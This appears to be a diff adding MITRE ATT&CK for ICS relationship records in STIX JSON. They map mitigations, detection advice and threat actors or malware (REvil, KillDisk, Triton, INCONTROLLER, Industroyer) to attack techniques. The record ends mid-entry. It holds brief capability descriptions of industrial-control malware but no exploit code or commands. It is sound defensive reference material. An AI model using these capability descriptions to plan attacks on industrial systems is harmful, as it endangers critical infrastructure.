+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "id": "relationship--09977105-562f-4f45-a151-27a11a18031e",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "created": "2020-09-21T17:59:24.739Z",
+ "modified": "2022-05-06T17:47:24.164Z",
+ "relationship_type": "mitigates",
+ "description": "The encryption of firmware should be considered to prevent adversaries from identifying possible vulnerabilities within the firmware.\n",
+ "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc",
+ "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--66d637a0-4874-4b12-bd3a-b408acb06d26",
+ "created": "2022-05-11T16:22:58.806Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-10-14T16:53:54.118Z",
+ "description": "Monitor for executed processes (such as ipconfig/ifconfig and arp) with arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses. 
Also monitor for executed processes that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+ "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--b343e131-e448-46c6-815b-b86e4bd6d638",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "Dragos Threat Intelligence August 2019",
+ "description": "Dragos Threat Intelligence 2019, August Global Oil and Gas Cyber Threat Perspective Retrieved. 2020/01/03 ",
+ "url": "https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-10-12T17:06:51.429Z",
+ "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) targeted several ICS vendors and manufacturers. 
(Citation: Dragos Threat Intelligence August 2019)",
+ "relationship_type": "uses",
+ "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4",
+ "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--c473686a-2452-4ee6-bf1d-54bf3e575d95",
+ "created": "2022-05-11T16:22:58.804Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-10-14T19:42:42.363Z",
+ "description": "Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+ "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--1f6b87f3-6749-4caa-98d3-265ebbe0ecbe",
+ "created": "2022-05-11T16:22:58.805Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-10-14T16:56:06.055Z",
+ "description": "Monitor for alike file hashes or characteristics (ex: filename) that are created on multiple hosts. 
",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
+ "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--1fd4cf4e-a26c-4fe5-a7fd-f49b8aea8437",
+ "created": "2021-04-12T18:49:06.044Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "Tom Fakterman August 2019",
+ "description": "Tom Fakterman 2019, August 05 Sodinokibi: The Crown Prince of Ransomware Retrieved. 2021/04/12 ",
+ "url": "https://www.cybereason.com/blog/the-sodinokibi-ransomware-attack"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-10-12T18:03:36.379Z",
+ "description": "[REvil](https://attack.mitre.org/software/S0496) initially executes when the user clicks on a JavaScript file included in the phishing emails .zip attachment. 
(Citation: Tom Fakterman August 2019)",
+ "relationship_type": "uses",
+ "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5",
+ "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--49d941a6-4da2-4516-92d0-1bc64554b2f2",
+ "created": "2022-05-11T16:22:58.803Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-10-14T19:37:44.970Z",
+ "description": "Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. 
Scripts should be captured from the file system when possible, to determine their actions and intent.",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd",
+ "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--81117328-e2bb-431c-a1ca-6ba7e6816637",
+ "created": "2022-09-26T16:25:38.511Z",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-09-26T16:25:38.511Z",
+ "description": "Consult asset management systems to understand expected program versions.",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706",
+ "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "id": "relationship--531e0589-0dad-444d-aca4-6198ba5d9fcd",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "created": "2020-09-21T17:59:24.739Z",
+ "modified": "2022-05-06T17:47:24.208Z",
+ "relationship_type": "mitigates",
+ "description": "Segment operational assets and their management devices based on their functional role within the process. Enabling more strict isolation to more critical control and operational information within the control environment. 
(Citation: Karen Scarfone; Paul Hoffman September 2009) (Citation: Keith Stouffer May 2015) (Citation: Department of Homeland Security September 2016) (Citation: Dwight Anderson 2014) \n",
+ "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291",
+ "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4",
+ "external_references": [
+ {
+ "source_name": "Karen Scarfone; Paul Hoffman September 2009",
+ "description": "Karen Scarfone; Paul Hoffman 2009, September Guidelines on Firewalls and Firewall Policy Retrieved. 2020/09/25 ",
+ "url": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-41r1.pdf"
+ },
+ {
+ "source_name": "Keith Stouffer May 2015",
+ "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ",
+ "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"
+ },
+ {
+ "source_name": "Department of Homeland Security September 2016",
+ "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ",
+ "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf"
+ },
+ {
+ "source_name": "Dwight Anderson 2014",
+ "description": "Dwight Anderson 2014 Protect Critical Infrastructure Systems With Whitelisting Retrieved. 
2020/09/25 ",
+ "url": "https://www.sans.org/reading-room/whitepapers/ICS/protect-critical-infrastructure-systems-whitelisting-35312"
+ }
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--b0fe8a56-cb76-4d79-9ba9-9358ef08aa08",
+ "created": "2022-05-11T16:22:58.806Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-09-26T16:59:13.486Z",
+ "description": "Monitor for device alarms produced when parameters are changed, although not all devices will produce such alarms.",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298",
+ "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "id": "relationship--8f90363e-2825-4178-807f-9268a28760fa",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "created": "2020-09-21T17:59:24.739Z",
+ "modified": "2022-05-06T17:47:24.195Z",
+ "relationship_type": "mitigates",
+ "description": "Enforce system policies or physical restrictions to limit hardware such as USB devices on critical assets.\n",
+ "source_ref": "course-of-action--9e3adcad-0b8f-4ecc-a2f3-06f607f53bf0",
+ "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "type": "relationship",
+ "id": 
"relationship--06782c99-93de-4db9-9c30-6f96aef894d2",
+ "created": "2023-03-30T19:06:49.501Z",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2023-03-30T19:06:49.501Z",
+ "description": "Monitor for newly executed processes that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data.",
+ "relationship_type": "detects",
+ "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+ "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "0.1",
+ "x_mitre_attack_spec_version": "3.1.0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "id": "relationship--e8af0b34-4a67-4966-a34a-c4d1b346ea15",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "created": "2020-09-21T17:59:24.739Z",
+ "modified": "2022-05-06T17:47:24.104Z",
+ "relationship_type": "mitigates",
+ "description": "All devices or systems changes, including all administrative functions, should require authentication. 
Consider using access management technologies to enforce authorization on all management interface access attempts, especially when the device does not inherently provide strong authentication and authorization functions.\n",
+ "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3",
+ "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--b252a076-6d4e-49f5-95ac-16264ef05b1d",
+ "created": "2017-12-14T16:46:06.044Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "Anton Cherepanov",
+ "description": "Anton Cherepanov BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry Retrieved. 2019/10/29 ",
+ "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2022-10-12T17:55:06.661Z",
+ "description": "[KillDisk](https://attack.mitre.org/software/S0607) is able to delete system files to make the system unbootable and targets 35 different types of files for deletion. 
(Citation: Anton Cherepanov)",
+ "relationship_type": "uses",
+ "source_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6",
+ "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ },
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "id": "relationship--f703f8b2-b6b9-41f3-a551-6bb3647c45cc",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "created": "2020-09-21T17:59:24.739Z",
+ "modified": "2022-05-06T17:47:24.147Z",
+ "relationship_type": "mitigates",
+ "description": "Use file system access controls to protect system and application folders.\n",
+ "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971",
+ "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "type": "relationship",
+ "id": "relationship--49d38b21-5ce5-48d9-a356-639fc6c7a53d",
+ "created": "2020-09-21T17:59:24.739Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "modified": "2023-03-08T22:27:26.605Z",
+ "description": "All field controllers should require users to authenticate for all remote or local management sessions. 
The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cea2f5a7-4871-4c62-a2d5-5a76aadf2d1a", + "created": "2022-09-26T14:37:45.140Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:37:45.140Z", + "description": "Monitor for anomalous or unexpected commands that may result in changes to the process operation (e.g., discrete write, logic and device configuration, mode changes) observable via asset application logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--44c857cf-7a4e-405a-87ca-7f6d79000589", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control 
Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:22:38.490Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9db1ecfe-72eb-42da-a09e-746663a53854", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "MDudek-ICS", + "description": "MDudek-ICS TRISIS-TRITON-HATMAN Retrieved. 
2019/11/03 ", + "url": "https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T20:46:03.389Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) contains a file named TS_cnames.py which contains default definitions for program state (TS_progstate). Program state is referenced in TsHi.py.(Citation: MDudek-ICS)\n\n[Triton](https://attack.mitre.org/software/S1009) contains a file named TS_cnames.py which contains default definitions for key state (TS_keystate). Key state is referenced in TsHi.py.(Citation: MDudek-ICS)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4cce6bf1-1aa9-483d-a733-d6e52e091419", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Atlassian Confluence Logging", + "description": "Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.", + "url": "https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html" + }, + { + "source_name": "Microsoft SharePoint Logging", + "description": "Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.", + "url": "https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2" + }, + { + "source_name": "Sharepoint Sharing Events", + "description": "Microsoft. (n.d.). Sharepoint Sharing Events. 
Retrieved October 8, 2021.", + "url": "https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:13:08.567Z", + "description": "Monitor for newly constructed logon behavior within Microsoft's SharePoint can be configured to report access to certain pages and documents.(Citation: Microsoft SharePoint Logging) Sharepoint audit logging can also be configured to report when a user shares a resource.(Citation: Sharepoint Sharing Events) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter.(Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a731ad54-0c3c-47bb-9559-d99950782beb", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:22:39.784Z", + "description": "Monitor interactions with network shares, such as reads or file transfers, using remote services such as Server Message Block (SMB). 
For added context on adversary procedures and background see [Remote Services](https://attack.mitre.org/techniques/T1021) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9f07c92a-78a0-438a-8cb2-01e2bddaeb42", + "created": "2021-01-04T21:30:14.830Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride 2017", + "description": "Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.", + "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + }, + { + "source_name": "Secureworks IRON VIKING", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. 
Retrieved June 10, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:46:32.756Z", + "description": "(Citation: Dragos Crashoverride 2018)(Citation: Dragos Crashoverride 2017)(Citation: ESET Industroyer)(Citation: Secureworks IRON VIKING)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2d07e32d-e9cd-4b19-86ad-4573824d6919", + "created": "2022-09-27T16:30:41.482Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:30:41.482Z", + "description": "Monitor device management protocols for functions that modify programs such as online edit and program append events.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cba8313b-c338-45f7-88ef-a514094882ac", + "created": "2022-09-28T20:28:39.348Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). 
Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.446Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) has the ability to exploit a vulnerable Asrock driver (AsrDrv103.sys) using CVE-2020-15368 to load its own unsigned driver on the system.(Citation: Wylie-22)", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b07e6896-a840-49a1-8d58-94396a902b95", + "created": "2023-03-31T17:56:07.978Z", + "revoked": false, + "external_references": [ + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. 
